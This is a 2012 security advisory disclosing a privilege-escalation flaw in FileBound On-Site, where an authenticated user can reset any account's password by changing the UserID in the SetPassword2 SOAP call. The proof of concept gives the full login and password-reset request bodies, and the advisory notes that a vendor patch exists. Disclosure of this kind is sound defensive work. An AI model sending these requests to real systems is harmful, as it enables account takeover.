Sense of Security – Security Advisory – SOS-12-010
Release Date. | 10-Oct-2012 |
Last Update. | 12-Oct-2012 |
Vendor Notification Date. | 14-Aug-2012 |
Product. | FileBound On-Site |
Platform. | Windows |
Affected versions. | 5.4.4 and 6.1.1 |
Severity Rating. | High |
Impact. | Privilege escalation |
Attack Vector. | Remote with authentication |
Solution Status. | Vendor patch |
CVE reference. | CVE- Not yet assigned |
Details.
The FileBound On-Site document management application is vulnerable to a privilege escalation attack by sending a modified password request to the FileBound web service.
By modifying the UserID value you can reset the password of any local user in the application without requiring administrative privileges.
Proof of Concept.
Authenticate to FileBound via the following web service method and SOAP request:
http://www.company.com/Filebound.asmx?op=Login
<soapenv:Body>
<fil:Login>
<fil:UserName>sosuser</fil:UserName>
<fil:Password>daisyp0p</fil:Password>
</fil:Login>
</soapenv:Body>
After authentication a request can be sent to the following administrators password reset web service method and
SOAP request:
http://www.company.com/Filebound.asmx?op=SetPassword2
<soapenv:Body>
<fil:SetPassword2>
<fil:UserID>32</fil:UserID>
<fil:Password>lightsouthern</fil:Password>
<fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
</fil:SetPassword2>
</soapenv:Body>
By modifying the UserID value the password can be reset for any existing user in the system. A response code of -1 confirms the password reset was successful.
Solution.
Install the latest vendor patch.
Discovered by.
Nathaniel Carew from Sense of Security Labs.